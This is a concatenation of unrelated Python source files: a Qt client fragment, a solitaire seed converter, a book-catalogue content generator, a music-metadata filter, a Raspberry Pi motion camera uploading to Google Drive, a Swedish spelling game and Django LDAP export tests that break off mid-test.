            QMessageBox.information(self, "Blocking Fortune Client",
                f"The following error occurred: {message}.")
        self._get_fortune_button.setEnabled(True)

    def enable_get_fortune_button(self):
        # The button is usable only when both fields are non-empty.
        self._get_fortune_button.setEnabled(self._host_line_edit.text() != '' and
                                            self._port_line_edit.text() != '')
if __name__ == '__main__':
    # Qt application bootstrap: create the app, show the client widget,
    # and enter the event loop.
    import sys
    app = QApplication(sys.argv)
    client = BlockingClient()
    client.show()
    sys.exit(app.exec())
|
<reponame>avchally/solitaire-python<filename>data/seed_processor.py<gh_stars>1-10
"""
generates a deck of cards based on a given seed
can also generate a seed with a given deck of cards
"""
import random
from .deck_of_cards import Card, Deck
# One character per card: a-z for hearts/spades, A-Z for diamonds/clubs.
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
# Suit and rank alphabets used when (re)generating hash_dict.
SUITS = "HSDC"
RANKS = "A23456789TJQK"
# Seed character -> two-char card code '<rank><suit>' (see generate_hash_dict).
hash_dict = {'a': 'AH', 'b': '2H', 'c': '3H', 'd': '4H', 'e': '5H', 'f': '6H',
             'g': '7H', 'h': '8H', 'i': '9H', 'j': 'TH', 'k': 'JH', 'l': 'QH',
             'm': 'KH', 'n': 'AS', 'o': '2S', 'p': '3S', 'q': '4S', 'r': '5S',
             's': '6S', 't': '7S', 'u': '8S', 'v': '9S', 'w': 'TS', 'x': 'JS',
             'y': 'QS', 'z': 'KS', 'A': 'AD', 'B': '2D', 'C': '3D', 'D': '4D',
             'E': '5D', 'F': '6D', 'G': '7D', 'H': '8D', 'I': '9D', 'J': 'TD',
             'K': 'JD', 'L': 'QD', 'M': 'KD', 'N': 'AC', 'O': '2C', 'P': '3C',
             'Q': '4C', 'R': '5C', 'S': '6C', 'T': '7C', 'U': '8C', 'V': '9C',
             'W': 'TC', 'X': 'JC', 'Y': 'QC', 'Z': 'KC'}
def generate_hash_dict():
    """Rebuild and print the seed-char -> card mapping.

    Only needed when the module-level ``hash_dict`` above has to be
    regenerated after a SUITS/RANKS change: paste the printed dict back
    into the source.  The mapping is also returned so callers don't have
    to re-parse stdout.  (The old version bound the result to a local
    named ``hash_dict``, shadowing the module-level table.)
    """
    # suit is the outer loop, matching the ordering of the table above
    cards = ('{}{}'.format(rank, suit) for suit in SUITS for rank in RANKS)
    mapping = dict(zip(chars, cards))
    print(mapping)
    return mapping
def seed_to_list(seed):
    """Translate a seed string into the corresponding list of Card objects."""
    return [Card(hash_dict[symbol][1], hash_dict[symbol][0])
            for symbol in seed]
def seed_to_deck(seed):
    """
    Returns a new Deck object whose cards are ordered by the input seed.
    """
    new_deck = Deck()
    new_deck.cards = seed_to_list(seed)
    return new_deck
def deck_to_seed(deck):
    """
    Takes a Deck object and returns its corresponding seed string.

    Builds a reverse lookup (card code -> seed char) once instead of the
    previous full scan of ``hash_dict`` for every card (which also never
    broke out of the inner loop on a match).
    """
    # invert hash_dict: 'AH' -> 'a', etc.
    reverse_dict = {crd: char for char, crd in hash_dict.items()}
    # unknown cards contribute nothing, matching the old scan's behaviour
    return ''.join(
        reverse_dict.get('{}{}'.format(card.get_rank(), card.get_suit()), '')
        for card in deck.cards)
def generate_random_seed():
    """Return a random 52-character seed: every key of ``hash_dict``
    exactly once, in random order (i.e. a shuffled full deck).

    Uses random.sample instead of the previous repeated
    ``pop(randrange(...))`` loop — same uniform result, clearer code.
    """
    keys = list(hash_dict.keys())
    return ''.join(random.sample(keys, len(keys)))
# THIS PROGRAM SHOULD NOT BE RUN AS A SCRIPT
# def main():
# # deck = deck_of_cards.Deck()
# # deck.expose_all()
# # deck.shuffle()
# # print(deck)
# # print(deck_to_seed(deck))
# deck = seed_to_deck('aWRcXysfdHiGnIUVEDKQrwevjokpNqMbSgzZFCJTAuxPhOmLBYlt')
# deck.expose_all()
# print(deck)
# print()
# print()
# print(generate_random_seed())
# if __name__ == '__main__':
# main() |
<filename>volumes-md.py
#-*- coding: utf-8 -*-
# volumes.lu
# Generate a Kirby-flavoured content tree (one folder + txt file per
# publisher and per book) from a semicolon-separated CSV export.

# config
csv_filepath = 'csv/volumes-le-havre-dominant.csv'

# imports
import os
import csv
import sys
from shutil import copyfile

# hifi slugification
sys.path.insert(0, 'libs')
from slughifi import slughifi


def write_field(f, key, value):
    """Write one Kirby 'Key: value' field followed by the field separator."""
    f.write('{}: {}'.format(key, value))
    f.write("\n\n----\n\n")


publishers = []
publisher_idx = 0
book_index = 0

with open(csv_filepath, "rt") as csv_file:
    reader = csv.reader(csv_file, delimiter=';', quotechar='"')
    for row_idx, row in enumerate(reader):
        publisher = row[0]
        title = row[1]
        author = row[2]
        book_url = row[3]
        collection = row[4]
        book_ref = row[5]
        # the CSV uses decimal commas for the dimensions; normalise to dots
        width = row[7].replace(',', '.')
        height = row[8].replace(',', '.')
        depth = row[6].replace(',', '.')
        credits_ = row[9]  # renamed: 'credits' shadows the builtin
        price = row[10]
        idx = row[11]
        canonical = row[12]
        clr = row[13]

        # first time we meet this publisher: create its folder + txt file
        if publisher not in publishers:
            publisher_idx += 1
            print('====')
            print(publisher)
            book_index = 0
            publishers.append(publisher)
            publisher_path = 'publishers/{}_{}'.format(publisher_idx,
                                                       slughifi(publisher))
            if not os.path.exists(publisher_path):
                os.makedirs(publisher_path)
            publisher_filename = os.path.join(publisher_path, 'publisher.txt')
            with open(publisher_filename, "w") as publisher_file:
                write_field(publisher_file, 'Title', publisher)
                # scheme://host part of this publisher's first book URL
                write_field(publisher_file, 'Publisher_url',
                            "/".join(book_url.split('/')[0:3]))

        print('----')
        print(title)
        book_slug = slughifi(title)
        book_path = os.path.join(publisher_path,
                                 '{}_{}'.format(book_index, book_slug))
        if not os.path.exists(book_path):
            os.makedirs(book_path)
        book_filename = os.path.join(book_path, 'book.txt')

        # "¶" separates title and subtitle in the CSV title column.
        # Reset subtitle on every row: previously it leaked from an earlier
        # book into every following book without a "¶".
        subtitle = None
        if "¶" in title:
            title, subtitle = [t.strip() for t in title.split("¶")]

        with open(book_filename, "w") as book_file:
            write_field(book_file, 'Title', title)
            if subtitle is not None:
                write_field(book_file, 'Subtitle', subtitle)
            write_field(book_file, 'Publisher', publisher)
            write_field(book_file, 'Author', author)
            write_field(book_file, 'Credits', credits_)
            write_field(book_file, 'Book_url', book_url)
            write_field(book_file, 'Price', price)
            write_field(book_file, 'Ref', book_ref)
            write_field(book_file, 'Width', width)
            write_field(book_file, 'Height', height)
            write_field(book_file, 'Depth', depth)
            write_field(book_file, 'Idx', idx)
            # copy the cover image next to the txt file
            img_path = "./couvs/{}.jpg".format(book_ref)
            img_filename = os.path.join(book_path, '{}.jpg'.format(book_ref))
            copyfile(img_path, img_filename)
            # color
            write_field(book_file, 'Color', clr)
        book_index += 1

print('====')
__all__ = [
'exclude_items',
'include_items',
]
import functools
import re
from itertools import filterfalse
from .utils import (
get_field,
get_item_tags,
normalize_value,
)
def _match_field(
field_value,
pattern,
*,
ignore_case=False,
normalize_values=False
):
"""Match an item metadata field value by pattern.
Note:
Metadata values are lowercased when ``normalized_values`` is ``True``,
so ``ignore_case`` is automatically set to ``True``.
Parameters:
field_value (list or str): A metadata field value to check.
pattern (str): A regex pattern to check the field value(s) against.
ignore_case (bool, Optional):
Perform case-insensitive matching.
Default: ``False``
normalize_values (bool, Optional):
Normalize metadata values to remove common differences between sources.
Default: ``False``
Returns:
bool: True if matched, False if not.
"""
if normalize_values:
ignore_case = True
normalize = normalize_value if normalize_values else lambda x: str(x)
search = functools.partial(re.search, flags=re.I) if ignore_case else re.search
# audio_metadata fields contain a list of values.
if isinstance(field_value, list):
return any(search(pattern, normalize(value)) for value in field_value)
else:
return search(pattern, normalize(field_value))
def _match_item(
        item,
        *,
        any_all=any,
        ignore_case=False,
        normalize_values=False,
        **kwargs
):
    """Match a single item's metadata against field filters.

    Note:
        Metadata values are lowercased when ``normalized_values`` is ``True``,
        so ``ignore_case`` is automatically set to ``True``.

    Parameters:
        item (~collections.abc.Mapping, str, os.PathLike): Item dict or filepath.
        any_all (callable, Optional):
            :obj:`any` (default) or :obj:`all`; decides whether any or all
            filters must match.
        ignore_case (bool, Optional):
            Perform case-insensitive matching.
            Default: ``False``
        normalize_values (bool, Optional):
            Normalize metadata values to remove common differences between sources.
            Default: ``False``
        kwargs (list, Optional): Lists of patterns to match per metadata field.

    Returns:
        bool: True if matched, False if not (None when no tags could be read).
    """
    tags = get_item_tags(item)
    if tags is None:
        # no readable metadata: same implicit-None result as before
        return None

    field_checks = (
        _match_field(
            get_field(tags, field),
            pattern,
            ignore_case=ignore_case,
            normalize_values=normalize_values,
        )
        for field, patterns in kwargs.items()
        for pattern in patterns
    )
    return any_all(field_checks)
def exclude_items(
        items,
        *,
        any_all=any,
        ignore_case=False,
        normalize_values=False,
        **kwargs
):
    """Exclude items whose metadata matches the given filters.

    Note:
        Metadata values are lowercased when ``normalized_values`` is ``True``,
        so ``ignore_case`` is automatically set to ``True``.

    Parameters:
        items (list): A list of item dicts or filepaths.
        any_all (callable, Optional):
            :obj:`any` (default) or :obj:`all`; decides whether any or all
            filters must match to exclude an item.
        ignore_case (bool, Optional):
            Perform case-insensitive matching.
            Default: ``False``
        normalize_values (bool, Optional):
            Normalize metadata values to remove common differences between sources.
            Default: ``False``
        kwargs (list, Optional): Lists of patterns to match per metadata field.

    Yields:
        dict: The next item that did not match (i.e. is kept).

    Example:
        >>> from google_music_utils import exclude_items
        >>> list(exclude_items(song_list, any_all=all, ignore_case=True, normalize_values=True, artist=['Beck'], album=['Golden Feelings']))
    """
    if not kwargs:
        # nothing to filter on — pass everything through
        return iter(items)

    predicate = functools.partial(
        _match_item,
        any_all=any_all,
        ignore_case=ignore_case,
        normalize_values=normalize_values,
        **kwargs
    )
    return filterfalse(predicate, items)
def include_items(
        items,
        *,
        any_all=any,
        ignore_case=False,
        normalize_values=False,
        **kwargs
):
    """Include only items whose metadata matches the given filters.

    Note:
        Metadata values are lowercased when ``normalized_values`` is ``True``,
        so ``ignore_case`` is automatically set to ``True``.

    Parameters:
        items (list): A list of item dicts or filepaths.
        any_all (callable, Optional):
            :obj:`any` (default) or :obj:`all`; decides whether any or all
            filters must match to include an item.
        ignore_case (bool, Optional):
            Perform case-insensitive matching.
            Default: ``False``
        normalize_values (bool, Optional):
            Normalize metadata values to remove common differences between sources.
            Default: ``False``
        kwargs (list, Optional): Lists of patterns to match per metadata field.

    Yields:
        dict: The next item that matched.

    Example:
        >>> from google_music_utils import exclude_items
        >>> list(include_items(song_list, any_all=all, ignore_case=True, normalize_values=True, artist=['Beck'], album=['Odelay']))
    """
    if not kwargs:
        # nothing to filter on — pass everything through
        return iter(items)

    predicate = functools.partial(
        _match_item,
        any_all=any_all,
        ignore_case=ignore_case,
        normalize_values=normalize_values,
        **kwargs
    )
    return filter(predicate, items)
|
# pke1029
# July 2018
# google drive api library
from __future__ import print_function
from apiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
from apiclient.http import MediaFileUpload
# camera and other library
from picamera import PiCamera
from picamera.array import PiRGBArray
from time import sleep
from datetime import datetime
import os
import shutil
import config
def capture_image(camera, res):
    """Capture one frame at resolution *res* and return its red channel.

    Auto exposure / white balance are (re)applied before each capture.
    Returns a 2-D array of shape (height, width) — the red plane of the
    RGB capture, used by motion_detect() for frame differencing.
    """
    camera.resolution = res
    with PiRGBArray(camera) as stream:
        camera.exposure_mode = 'auto'
        camera.awb_mode = 'auto'
        camera.capture(stream, format='rgb')
        # return red value
        return stream.array[:, :, 0]
def motion_detect(camera, res, frequency, threshold, sensitivity):
    """Block until motion is detected; returns True.

    Successive low-res captures (red channel only) are compared: a pixel
    counts as "changed" when it differs by more than *threshold*, and
    motion is declared when more than *sensitivity* pixels changed.

    Parameters:
        camera: PiCamera instance.
        res: (width, height) capture resolution.
        frequency: checks per second (Hz).
        threshold: per-pixel difference threshold, [0, 256].
        sensitivity: number of changed pixels that counts as motion.

    The per-pixel work is vectorized with numpy (the capture is already a
    numpy array); the old double Python loop was O(w*h) interpreted code
    per frame.  The motion decision is unchanged.
    """
    import numpy as np  # local import: keeps this fix self-contained

    # int16 so the subtraction can go negative without wrapping (frames
    # are uint8)
    data_old = capture_image(camera, res).astype(np.int16)
    while True:
        # wait between checks
        sleep(1 / frequency)
        data_new = capture_image(camera, res).astype(np.int16)
        # count pixels whose red value changed by more than threshold
        diff_count = int(np.count_nonzero(np.abs(data_old - data_new) > threshold))
        if diff_count > sensitivity:
            return True
        # no motion: the new frame becomes the reference
        data_old = data_new
def record_video(camera, res, duration, file_name):
    """Record *duration* seconds of video at *res* into *file_name*.

    Format is implied by the file name (callers use '.h264').
    """
    # set resolution
    camera.resolution = res
    # set file name
    camera.start_recording(file_name)
    # wait for recording
    camera.wait_recording(duration)
    # end recording
    camera.stop_recording()
def authenticate():
    """Authenticate against Google Drive and return a v3 service object.

    Credentials are cached in 'credentials.json'; when absent or invalid,
    an OAuth flow is run from 'client_secret.json' (opens a browser /
    console prompt on first run).
    """
    # authorization as owner
    SCOPES = 'https://www.googleapis.com/auth/drive'
    # store permission (credentials)
    store = file.Storage('credentials.json')
    # get credentials/token
    creds = store.get()
    # if there is no credentials, request one
    if not creds or creds.invalid:
        flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)
        creds = tools.run_flow(flow, store)
    # authenticate
    drive_service = build('drive', 'v3', http=creds.authorize(Http()))
    return drive_service
def get_folder_id(drive_service, folder_name):
    """Return the Drive id of the first file named *folder_name*, or
    ``False`` when none exists (sentinel kept for existing callers).

    NOTE(review): the query matches by name only, not by folder mimeType —
    confirm that name collisions with non-folders cannot happen here.
    """
    # Escape backslashes and quotes so a name cannot break out of the
    # Drive query string (query-injection hardening).
    escaped = folder_name.replace("\\", "\\\\").replace("'", "\\'")
    query1 = "name='" + escaped + "'"
    response = drive_service.files().list(q=query1,
                                          fields='nextPageToken, files(id, name)').execute()
    items = response.get('files', [])
    if items:
        return items[0]['id']
    return False
def create_folder(drive_service, folder_name):
    """Create a Drive folder named *folder_name* and return its id."""
    # folder info (renamed local: 'file' shadowed the builtin)
    metadata = {'name': folder_name,
                'mimeType': 'application/vnd.google-apps.folder'}
    # create folder and read back its id
    created = drive_service.files().create(body=metadata,
                                           fields='id').execute()
    return created.get('id')
def upload_file(drive_service, file_name, folder_id, file_path, mimetype):
    """Upload *file_path* into the Drive folder *folder_id*.

    Returns the id of the newly created Drive file.
    """
    # target name and parent folder
    metadata = {'name': file_name,
                'parents': [folder_id]}
    # wrap the local file for upload
    media = MediaFileUpload(file_path,
                            mimetype=mimetype)
    # upload and read back the new file's id
    created = drive_service.files().create(body=metadata,
                                           media_body=media,
                                           fields='id').execute()
    return created.get('id')
def get_folder_list(text_file):
    """Read the list of uploaded-folder names from *text_file*.

    Returns an empty list when the file does not exist.  Blank lines are
    skipped: the file is written with one trailing newline per name, so
    the previous ``split('\\n')`` produced a bogus '' entry that counted
    against ``log_day`` and could be handed to the delete logic.
    """
    if not os.path.isfile(text_file):
        return []
    with open(text_file, 'r') as f:
        return [name for name in f.read().splitlines() if name]
def main():
    """Motion-triggered security camera loop.

    Waits for motion, records an h264 clip into a per-day folder, uploads
    it to a same-named Google Drive folder, and prunes local + remote
    folders older than ``log_day`` days (tracked in folder_list.txt).
    Runs forever; terminated externally (see the __main__ guard).
    """
    # parameters
    rotation = config.rotation          # camera orientation
    lo_res = config.lo_res              # resolution for motion detect
    hi_res = config.hi_res              # resolution for video recording
    frequency = config.frequency        # frequency of motion detect (Hz)
    fps = config.fps                    # fps for video recording
    duration = config.duration          # duration of recording
    threshold = config.threshold        # difference in each pixel [0, 256]
    sensitivity = config.sensitivity    # difference in each frame [0, 128*96]
    log_day = config.log_day            # number of days to keep the log of
    # authenticate google drive
    print('authenticating...', end='')
    drive_service = authenticate()
    print(' success')
    # initialize camera (sleep lets the sensor settle before first capture)
    camera = PiCamera()
    camera.rotation = rotation
    sleep(5)
    # get folder list (one entry per already-seen day)
    text_file = 'folder_list.txt'
    folder_list = get_folder_list(text_file)
    while True:
        # check if there is motion (blocks until detected)
        print('dectecting motion...', end='')
        motion = motion_detect(camera, lo_res, frequency, threshold, sensitivity)
        if motion is True:
            # get current time; folder per day, file per event time
            now = datetime.now()
            print(' motion detected ' + str(now))
            folder_name = str(now.date())
            file_name = str(now.time()) + '.h264'
            # make a local folder for today if needed
            if not os.path.exists(folder_name):
                os.makedirs(folder_name)
            file_path = folder_name + '/' + file_name
            # record video
            print('recording...', end='')
            record_video(camera, hi_res, duration, file_path)
            print(' done')
            # check if folder on google drive
            folder_id = get_folder_id(drive_service, folder_name)
            # if not, create one and remember the new day locally
            if folder_id is False:
                folder_id = create_folder(drive_service, folder_name)
                # record folder name
                folder_list.append(folder_name)
                with open(text_file, 'a') as f:
                    f.write(folder_name + '\n')
            # upload video to drive
            print('uploading...', end='')
            upload_file(drive_service, file_name, folder_id, file_path, 'video/h264')
            print(' success')
            # check if too much log: drop the oldest day everywhere
            if len(folder_list) > log_day:
                print('deleting folder...', end='')
                # get folder name and id
                folder_name = folder_list.pop(0)
                folder_id = get_folder_id(drive_service, folder_name)
                # delete from drive
                drive_service.files().delete(fileId=folder_id).execute()
                # delete local folder
                shutil.rmtree(folder_name)
                # rewrite the text file without the removed entry
                with open(text_file, 'w') as f:
                    for folder in folder_list:
                        f.write(folder + '\n')
                print(' success')
if __name__ == '__main__':
    try:
        main()
    finally:
        # always print the sign-off, even on Ctrl-C or an unhandled error
        print('\nEnd of programme, developed by pke1029')
|
<reponame>SimonKagstrom/spelly<gh_stars>0
import pyttsx3
import random
import blessed
import time
def changeVoice(engine, language, gender='VoiceGenderFemale'):
    """Select the first installed TTS voice matching *language* and *gender*.

    Returns True on success; raises RuntimeError when no voice matches.
    """
    candidates = (v for v in engine.getProperty('voices')
                  if language in v.languages and gender == v.gender)
    chosen = next(candidates, None)
    if chosen is not None:
        engine.setProperty('voice', chosen.id)
        return True
    raise RuntimeError("Language '{}' for gender '{}' not found".format(language, gender))
class Spelly:
    """Spelling game driven by pyttsx3's 'finished-utterance' callback.

    The game is a small state machine; event() advances it one step each
    time an utterance finishes.  NOTE(review): relies on the module-level
    globals ``engine`` (pyttsx3) and ``term`` (blessed.Terminal) created
    in the __main__ block — confirm before reusing this class elsewhere.
    """

    # state machine constants
    ST_WELCOME = 1        # initial state, before run()
    ST_PRESENT_WORD = 2   # announce the next word to spell
    ST_WAIT_KEYS = 3      # collecting one keypress per letter
    ST_WORD_DONE = 4      # evaluate the player's answer

    def __init__(self, term):
        self.term = term
        # "<NAME>" entries are dataset anonymization placeholders
        self.nicks = ["Roy", "<NAME>", "<NAME>", "Gubba-lubben"]
        self.words = ["kalkon", "måne", "ninja", "lego", "linda", "moa", "simon", "skola"]
        # NOTE(review): this aliases self.words (no copy), so the shuffle
        # below also reorders self.words — copy if original order matters.
        self.shuffledWords = self.words
        self.talkQueue = []      # pending utterances, spoken one per onEnd
        self.curWord = ""        # word currently being spelled
        self.curGuess = ""       # display string: typed chars + '_' padding
        self.chars = []          # keypresses collected for the current word
        self.state = Spelly.ST_WELCOME
        engine.connect('finished-utterance', self.onEnd)
        random.shuffle(self.shuffledWords)

    def getNick(self):
        """Pick a random nickname to address the player with."""
        return random.choice(self.nicks)

    def getWord(self, length):
        """Pop the next word, or None when exhausted.

        NOTE(review): the ``length`` parameter is currently unused.
        """
        if len(self.shuffledWords) == 0:
            return None
        out = self.shuffledWords.pop()
        return out

    def getCharacter(self):
        """Blocking single-keypress read (raw mode, hidden cursor)."""
        with term.cbreak(), term.hidden_cursor():
            inp = term.inkey()
        return inp

    def onEnd(self, name, completed):
        """pyttsx3 callback: speak any queued text, then advance the game."""
        if len(self.talkQueue) != 0:
            cur = self.talkQueue.pop()
            engine.say(cur)
        self.event()

    def event(self):
        """Advance the state machine one step (runs after each utterance)."""
        if self.state == Spelly.ST_PRESENT_WORD:
            self.curWord = self.getWord(2)
            if self.curWord == None:
                # out of words: game over, stop advancing
                return
            self.state = Spelly.ST_WAIT_KEYS
            self.chars = []
            self.curGuess = "_" * len(self.curWord)
            print(term.home + term.clear + term.move_y(term.height // 2))
            print(term.black_on_darkslategray3(term.center(self.curGuess)))
            engine.say(f"{self.getNick()}, stava till ordet {self.curWord}, {len(self.curWord)} bokstäver")
        elif self.state == Spelly.ST_WAIT_KEYS:
            if len(self.curWord) == len(self.chars):
                # all letters typed: announce the answer, evaluate next step
                self.state = Spelly.ST_WORD_DONE
                what = "".join(self.chars)
                engine.say(f"Du svarade {what}")
            else:
                # read one letter, update the on-screen guess, echo it aloud
                c = self.getCharacter()
                left = len(self.curWord) - len(self.chars) - 1
                self.chars.append(c)
                self.curGuess = "".join(self.chars) + "_" * left
                print(term.home + term.clear + term.move_y(term.height // 2))
                print(term.black_on_chartreuse3(term.center(self.curGuess)))
                engine.say(c)
        elif self.state == Spelly.ST_WORD_DONE:
            # compare the typed answer with the target word
            what = "".join(self.chars)
            self.state = Spelly.ST_PRESENT_WORD
            text = f"Nästan rätt, försök igen!"
            prettyText = term.black_on_darkorange1(term.center(text))
            if what == self.curWord:
                text = f"Helt rätt, ta ett nytt ord!"
                prettyText = term.black_on_chartreuse3(term.center(text))
            print(term.home + term.clear + term.move_y(term.height // 2))
            print(prettyText)
            engine.say(text)

    def run(self):
        """Start the game: greet the player and enter the pyttsx3 loop."""
        self.state = Spelly.ST_PRESENT_WORD
        engine.say("Välkommen!")
        engine.startLoop()
if __name__ == "__main__":
term = blessed.Terminal()
print(term.home + term.clear + term.move_y(term.height // 2))
print(term.black_on_darkkhaki(term.center('Stavning!')))
engine = pyttsx3.init()
spelly = Spelly(term)
changeVoice(engine, "sv_SE", "VoiceGenderFemale")
spelly.run()
|
from django.test import TestCase
from data_facility_admin.models import *
from data_facility_admin.helpers import LDAPHelper
import mock
from mockldap import MockLdap
from django.conf import settings
import ldap
from django.utils import timezone
import datetime
class BaseLdapTestCase(TestCase):
    """Shared fixture for LDAP-export tests.

    Boots a MockLdap directory mirroring the DFAdmin tree (People, Groups,
    Projects, Datasets OUs) and provides setUser() to create/update the
    test user.  "<NAME>"/"<EMAIL>" literals are dataset anonymization
    placeholders.
    """

    # DNs for the single test user created by setUser()
    USER_LDAP_ID = LdapObject.MIN_LDAP_UID
    USER_FULL_DN = 'uid=johnlennon,ou=people,' + settings.LDAP_BASE_DN
    USER_GROUP_FULL_DN = 'cn=johnlennon,ou=groups,' + settings.LDAP_BASE_DN

    def setUp(self):
        """Start MockLdap with the base entries and keep a handle on the server mock."""
        info = ('dc=local', { 'dc': ['local']})
        adrf = (settings.LDAP_BASE_DN, { 'dc': ['dfadmin']})
        admin = (settings.LDAP_SETTINGS['Connection']['BindDN'],
                 { 'cn': [ 'admin'], 'userPassword': [settings.LDAP_SETTINGS['Connection']['BindPassword']]})
        people = ('ou=People,' + settings.LDAP_BASE_DN, {'ou': ['People']})
        groups = ('ou=Groups,' + settings.LDAP_BASE_DN, {'ou': ['Groups']})
        projects = ('ou=Projects,' + settings.LDAP_BASE_DN, {'ou': ['Projects']})
        datasets = ('ou=Datasets,' + settings.LDAP_BASE_DN, {'ou': ['Datasets']})
        directory = dict([info, adrf, admin, people, groups, projects, datasets])
        self.mockldap = MockLdap(directory)
        self.mockldap.start()
        self.ldapobj = self.mockldap[settings.LDAP_SERVER]

    def tearDown(self):
        """Stop MockLdap and drop the server handle."""
        self.mockldap.stop()
        del self.ldapobj

    @classmethod
    def setUser(cls, ldap_id=USER_LDAP_ID, ldap_name=None, first_name="John",
                last_name="Lennon",
                email="<EMAIL>",
                status=User.STATUS_ACTIVE,
                ldap_last_auth_time=None,
                ldap_lock_time=None,
                ldap_last_pwd_change=None,
                created_at=None,
                updated_at=None,
                system_user=False):
        """Create or update the User row with the given ldap_id and save it.

        Optional LDAP timestamps / ldap_name / created_at are only assigned
        when provided, so repeated calls can tweak individual fields.
        NOTE(review): the ``updated_at`` parameter is accepted but never
        applied — confirm whether that is intentional.
        """
        result = User.objects.filter(ldap_id=ldap_id)
        if len(result) == 0:
            u = User(ldap_id=ldap_id)
        else:
            u = result[0]
        u.first_name = first_name
        u.last_name = last_name
        u.email = email
        u.status = status
        u.system_user = system_user
        if ldap_last_auth_time:
            u.ldap_last_auth_time = ldap_last_auth_time
        if ldap_lock_time:
            u.ldap_lock_time = ldap_lock_time
        if ldap_last_pwd_change:
            u.ldap_last_pwd_change = ldap_last_pwd_change
        if ldap_name:
            u.ldap_name = ldap_name
        if created_at:
            u.created_at = created_at
        u.save()
class LdapTestCase(BaseLdapTestCase):
    """Exercises LDAPHelper.export_users() against the MockLdap directory.

    KeycloakHelper is patched out in every test so only the LDAP side runs.
    """

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_pending_approval_user(self, mock_keycloak):
        """A user pending approval must NOT be exported to LDAP."""
        self.setUser(status=User.STATUS_PENDING_APPROVAL)
        self.assertTrue(len(User.objects.all()) == 1, "The databse should have only one user")
        ldap_helper = LDAPHelper()
        values = ldap_helper.flat_attributes_from_settings(settings.USER_LDAP_MAP.values())
        self.ldapobj.search_s.seed(settings.LDAP_USER_SEARCH, ldap.SCOPE_SUBTREE, '(uid=*)', values)([])
        LDAPHelper().export_users()
        self.assertTrue(len([x for x in self.ldapobj.methods_called() if x == 'add_s']) == 0, "The add_s method should inot have been called")
        # NOTE(review): the two messages below contradict the assertFalse —
        # they should read "should NOT have been inserted".
        self.assertFalse(self.USER_FULL_DN in self.ldapobj.directory, "The user should have been inserted")
        self.assertFalse(self.USER_GROUP_FULL_DN in self.ldapobj.directory, "The user private group should have been inserted")

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_new_user(self, mock_keycloak):
        """A NEW user is exported: user entry plus its private group."""
        self.setUser(status=User.STATUS_NEW)
        self.assertTrue(len(User.objects.all()) == 1, "The databse should have only one user")
        ldap_helper = LDAPHelper()
        # values = ldap_helper.flat_attributes_from_settings(settings.USER_LDAP_MAP.values())
        # self.ldapobj.search_s.seed(settings.LDAP_USER_SEARCH, ldap.SCOPE_SUBTREE, '(uid=*)', values)([])
        LDAPHelper().export_users()
        self.assertTrue(len([x for x in self.ldapobj.methods_called() if x == 'add_s']) == 2, "The add_s method should have been called twice")
        self.assertTrue(self.USER_FULL_DN in self.ldapobj.directory, "The user should have been inserted")
        self.assertTrue(self.USER_GROUP_FULL_DN in self.ldapobj.directory, "The user private group should have been inserted")

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_user_updates(self, mock_keycloak):
        """Changes to name/email in the DB propagate to LDAP on re-export."""
        self.setUser(status=User.STATUS_NEW)
        self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
        ldap_helper = LDAPHelper()
        ldap_helper.export_users()
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["first_name"]][0], "John", "Ldap Should have the original first_name")
        self.setUser(first_name="Rafael")
        self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
        ldap_helper.export_users()
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["first_name"]][0], "Rafael", "LDAP should have the new first name")
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN]["cn"][0], "<NAME>", "LDAP should have the a new full name")
        self.setUser(first_name="Rafael", last_name="Alves")
        self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
        ldap_helper.export_users()
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["last_name"]][0], "Alves", "LDAP should have the new last_name")
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN]["cn"][0], "<NAME>")
        self.setUser(first_name="Rafael", last_name="Alves", email="<EMAIL>")
        self.assertEqual(len(User.objects.all()), 1, "The databse should have only one user")
        ldap_helper.export_users()
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["email"]][0], "<EMAIL>", "Check if the email has been updated in LDAP")

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_locking_and_unlocking_user(self, mock_keycloak):
        """Admin lock sets the LDAP lock-time attribute; unlock removes it."""
        self.setUser(status=User.STATUS_NEW)
        ldap_helper = LDAPHelper()
        ldap_helper.export_users()
        self.setUser(status=User.STATUS_LOCKED_BY_ADMIN)
        ldap_helper.export_users()
        self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
        self.setUser(status=User.STATUS_UNLOCKED_BY_ADMIN)
        ldap_helper.export_users()
        self.assertNotIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_disabling_user(self, mock_keycloak):
        """Disabling a user sets the LDAP lock-time attribute."""
        self.setUser(status=User.STATUS_NEW)
        ldap_helper = LDAPHelper()
        ldap_helper.export_users()
        self.setUser(status=User.STATUS_DISABLED)
        ldap_helper.export_users()
        self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_inactive_users_last_auth_time(self, mock_keycloak):
        """A user whose last auth is 60 days old is auto-locked for inactivity."""
        self.setUser(status=User.STATUS_NEW)
        ldap_helper = LDAPHelper()
        ldap_helper.export_users()
